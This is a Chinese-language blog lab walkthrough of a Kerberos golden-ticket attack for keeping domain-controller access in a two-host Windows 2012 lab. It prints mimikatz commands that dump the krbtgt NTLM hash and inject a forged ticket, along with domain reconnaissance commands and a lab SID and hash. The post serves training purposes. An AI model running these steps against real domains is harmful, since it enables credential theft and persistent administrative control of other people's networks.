黄金票据维持域控权限

本文介绍了一种通过黄金票据攻击维持域控制器权限的方法。具体步骤包括:导出krbtgt的NTLMHash,获取域内基本信息如SID及管理员账号等,最终生成并注入票据以实现权限维持。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

实验环境:windows2012域控、windows2012域内主机

实验要求:利用黄金票据维持域控权限

实验内容

实验环境:
域控制器
Ip地址:192.168.33.139
域名:son.yang.com
用户名:administrator
密码:111.aaa
域成员服务器
IP地址:192.168.33.140
域名:son.yang.com
用户名:2012-3
密码:333.aaa

导出krbtgt的NTLM Hash

在与控制器中打开命令行环境,运行mimikatz,输入如下命令
privilege::debug
Lsadump::lsa /patch /name:krbtgt
在这里插入图片描述
导出krbtgt的NTLM Hash

获取基本信息

在域成员服务器中获取基本信息

获取域SID

在命令行环境中输入如下命令,查询SID
wmic useraccount get name,sid
在这里插入图片描述
采用这种方法,可以以普通域用户权限获取域内所有用户的SID。可以看到son.yang.com的域SID号。

获取当前用户的SID

输入如下命令,获取当前用户的SID
Whoami /user
在这里插入图片描述

查询域管理员账号

输入如下命令,查询域管理员账号
net group “domain admins” /domain
在这里插入图片描述

查询域名

在命令行环境中输入如下命令,查询域名
ipconfig /all
在这里插入图片描述

实验操作

在获取目标主机的权限后,查看当前用户及其所属的组
在这里插入图片描述
输入命令“dir //2012-12/c$”,在注入票据前将返回提示信息“拒绝访问”
在这里插入图片描述

清空票据

在mimikatz中输入如下命令,将票据清空
Kerberos::purge
在这里插入图片描述
Sid:S-1-5-21-3907342585-4074712004-4245116346
b7c2c6b78141e1204a4c61137c4ff9e7

利用获取的信息,生成票据

输入命令,使mimikatz生成包含krbtgt身份的票据
在这里插入图片描述
命令执行后会提示保存成功,会在本地目录下生成一个名为“Administrator.kiribi”的文件

传递票据并注入内存

输入命令,将Administrator.kiribi票据注入内存
Kerberos::ptt Administrator.kiribi
在这里插入图片描述

检索当前会话中的票据

在mimikatz中输入如下命令,刚刚注入的票据就会出现在当前的会话中
Kerberos::tgt
在这里插入图片描述

验证权限

退出mimikatz,验证实验中伪造的身份是否已经得到了域控制器的权限
在mimikatz中,输入“exit”命令退出,在当前命令行窗口中输入命令“dir //2012-2/c$”
2012-2为域控制器
在这里插入图片描述
可以看到,在将票据注入内存之前,系统提示权限不足;再将票据注入内存之后,列出了域控制器C盘的目录,表示身份伪造成功。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值